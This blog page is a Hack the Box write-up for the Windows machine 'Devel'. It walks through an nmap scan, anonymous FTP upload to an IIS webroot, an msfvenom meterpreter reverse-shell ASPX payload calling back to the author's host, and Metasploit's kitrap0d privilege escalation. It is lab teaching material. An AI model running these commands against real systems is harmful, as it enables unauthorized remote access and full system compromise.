<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Hack the Box: Devel | Payton H.</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="In today’s writeup we’ll be looking a Hack the Box’s Devel. This is a retired windows machine with a difficulty of easy. Contents Tools Enumeration Exploitation    - Generate Payload    - Access Shel">
<meta property="og:type" content="article">
<meta property="og:title" content="Hack the Box: Devel">
<meta property="og:url" content="https://walmartdeli.github.io/2020/05/17/htb-devel/index.html">
<meta property="og:site_name" content="Payton H.">
<meta property="og:description" content="In today’s writeup we’ll be looking a Hack the Box’s Devel. This is a retired windows machine with a difficulty of easy. Contents Tools Enumeration Exploitation    - Generate Payload    - Access Shel">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://walmartdeli.github.io/2020/05/17/htb-devel/devel.png">
<meta property="og:image" content="https://walmartdeli.github.io/2020/05/17/htb-devel/nmap.png">
<meta property="og:image" content="https://walmartdeli.github.io/2020/05/17/htb-devel/ftplogin.png">
<meta property="og:image" content="https://walmartdeli.github.io/2020/05/17/htb-devel/delitest.png">
<meta property="og:image" content="https://walmartdeli.github.io/2020/05/17/htb-devel/handler.png">
<meta property="og:image" content="https://walmartdeli.github.io/2020/05/17/htb-devel/shell1.png">
<meta property="og:image" content="https://walmartdeli.github.io/2020/05/17/htb-devel/suggester.png">
<meta property="article:published_time" content="2020-05-17T23:53:56.000Z">
<meta property="article:modified_time" content="2020-05-18T03:31:15.574Z">
<meta property="article:author" content="Payton H.">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://walmartdeli.github.io/2020/05/17/htb-devel/devel.png">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Payton H.</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">Cyber Security Student</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://walmartdeli.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-htb-devel" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/05/17/htb-devel/" class="article-date">
  <time datetime="2020-05-17T23:53:56.000Z" itemprop="datePublished">2020-05-17</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/htb/">Hack the Box</a>►<a class="article-category-link" href="/categories/htb/Easy/">Easy</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Hack the Box: Devel
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <img src="/2020/05/17/htb-devel/devel.png" class="" title="ftp Devel">
<p>In today’s writeup we’ll be looking a Hack the Box’s Devel. This is a retired windows machine with a difficulty of easy.</p>
<h2 id="Contents"><a href="#Contents" class="headerlink" title="Contents"></a>Contents</h2><p> <a href="#Tools">Tools</a><br> <a href="#Enumeration">Enumeration</a><br> <a href="#Exploitation">Exploitation</a><br>    - <a href="#Generate-Payload">Generate Payload</a><br>    - <a href="#Access-Shell">Access Shell</a><br> <a href="#Post-Exploitation">Post-Exploitation</a><br>    - <a href="#Getting-Root-Access">Getting Root Access</a><br>    - <a href="#Find-the-Flags">Find the Flags</a></p>
<h2 id="Tools"><a href="#Tools" class="headerlink" title="Tools"></a>Tools</h2><ul>
<li>Nmap</li>
<li>ftp</li>
<li>Mesasploit<ul>
<li>windows/meterpreter/reverse_tcp</li>
<li>post/multi/recon/local_exploit_suggester</li>
<li>exploit/windows/local/ms10_015_kitrap0d</li>
</ul>
</li>
<li>msfvenom</li>
</ul>
<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><p>As always, lets start by scanning the machine with nmap.</p>
<p><code>nmap -A -T4 -p- 10.10.10.5</code></p>
<p>After letting it scan the results are in:</p>
<img src="/2020/05/17/htb-devel/nmap.png" class="" title="Nmap scan">
<p>As we can see, both ports 21 and 80 are open. Port 21 is usually used for an ftp(file transfer protocol) server used to transfer a file between a server and a client, and port 80 is typically used for http websites.</p>
<p>Under the ftp scan we see that the ftp server allows anonymous login, a big no-no, and has a couple files in it that might be related to the website. We can test this theory by placing a file within the ftp server and checking if we can execute it on the webpage.</p>
<p>To access the ftp server we got to our terminal and type in <code>ftp 10.10.10.5</code>. Then we log in with <code>anonyomus</code> and press enter for the password.</p>
<p>Now I have an image in my dowloads folder called walmart-deli.jpg. To change my local directory in the ftp console I’ll enter <code>lcd /Downloads</code>. Your screen should end up looking something like this.</p>
<img src="/2020/05/17/htb-devel/ftplogin.png" class="" title="ftp login">

<p>Next we’ll <code>put walmart-deli.jpg</code> and transfer the image to the server. To ensure that the image properly transfers you might want to enter <code>binary</code> before transfering the image to the server. If we go to the website be typing <code>http://10.10.10.5</code> into our browser we’ll see default page for IIS7, a web server created by microsoft. Then we’ll go to <code>http://10.10.10.5/walmart-deli.jpg</code> and see its was able to execute.</p>
<img src="/2020/05/17/htb-devel/delitest.png" class="" title="Image Test">

<p>With this tested, we now know that we are able to execute code by placing it in the ftp server and accessing it from the website.</p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><h3 id="Generate-Payload"><a href="#Generate-Payload" class="headerlink" title="Generate Payload"></a>Generate Payload</h3><p>In our terminal, we’ll use msfvenom to generate a payload to upload to the server.<br><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx &gt; ex.aspx</code></p>
<ul>
<li><strong>-p</strong>: Will set the payload from metasploit. We’ll use a meterpreter reverse shell for this machine.</li>
<li><strong>LHOST</strong>: This sets the listener host that waits for a signal from the target machine. This should be your own ip, and for us it was 10.10.14.7.</li>
<li><strong>LPORT</strong>: Sets the port we’ll be send the signal through when setting up a shell. We’ll use the Metasploit default 4444.</li>
<li><strong>-f</strong>: This sets the format of the payload. IIS uses .aspx to run scripts so we’ll it to aspx.</li>
</ul>
<p>Last we’ll output the payload to a file called <code>ex.aspx</code>. With the file saved, we’ll go back into the ftp server and and upload the script into it. </p>
<h3 id="Access-Shell"><a href="#Access-Shell" class="headerlink" title="Access Shell"></a>Access Shell</h3><p>Next we’ll have to setup a handler to catch the shell signal sent by our victim. Do do that we’ll open up <code>msfconsole</code> and <code>use exploit/multi/hander</code>. We’ll <code>set payload windows/meterpreter/reverse_tcp</code>, then <code>set lhost 10.10.14.7</code>, or whatever your local ip is, and then <code>set lport 4444</code>. Once complete our options should appear similar to this:</p>
<img src="/2020/05/17/htb-devel/handler.png" class="" title="Handler Options">

<p>The handler works like ncat and will set up a listener that waits for a signal on port 4444 to open up the meterpreter shell from the victim machine. We’ll <code>run</code> the handler and the run our script by going to <code>http://10.10.10.5/ex.aspx</code>. Once the script is run we’ll go back to our terminal and see that the meterpreter shell is running;however, if we try <code>getuid</code> we’ll see that we’re not a admin account.</p>
<img src="/2020/05/17/htb-devel/shell1.png" class="" title="Shell">

<h2 id="Post-Exploitation"><a href="#Post-Exploitation" class="headerlink" title="Post-Exploitation"></a>Post-Exploitation</h2><h3 id="Getting-Root-Access"><a href="#Getting-Root-Access" class="headerlink" title="Getting Root Access"></a>Getting Root Access</h3><p>To get root access we’ll need to see if the machine is vulnerable to any more attacks. To do this we’ll send the shell to <code>background</code> and <code>use post/multi/recon/local_exploit_suggester</code>. This module will scan the machine and see if its vulnerable to any more exploits. All we need to do now is <code>set session 1</code>, or what your shell session is, and then <code>run</code>. The complete scan should look like this:</p>
<img src="/2020/05/17/htb-devel/suggester.png" class="" title="Suggester Result">
<p>We’re going to <code>use exploit/windows/local/ms10_015_kitrap0d</code> and <code>set session</code> to the same session as our shell then <code>run</code>. Once its done running we should have a shell with root access.</p>
<h3 id="Find-the-Flags"><a href="#Find-the-Flags" class="headerlink" title="Find the Flags"></a>Find the Flags</h3><p>We can finish by finding the admin and user flags.<br>In meterpreter <code>cd</code> into <code>C:\Users\Administrator\Desktop</code>. Once in the directory, enter <code>ls</code> to find <code>root.txt</code>. To see its contents enter <code>cat root.txt</code>.</p>
<p>Similarly, for the user <code>cd</code> into <code>C:\Users\babis\Desktop</code>. Type <code>ls</code> to see that there is a <code>user.txt</code> file. Run the <code>cat</code> command on user.txt and you should see the user flag.</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://walmartdeli.github.io/2020/05/17/htb-devel/" data-id="ckabpuo300000a1wd0iem6hhh" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2020/05/15/htb-legacy/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hack the Box: Legacy</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/htb/">Hack the Box</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/htb/Easy/">Easy</a></li></ul></li></ul>
    </div>
  </div>


  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a></li></ul>
    </div>
  </div>


  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 Payton H.<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>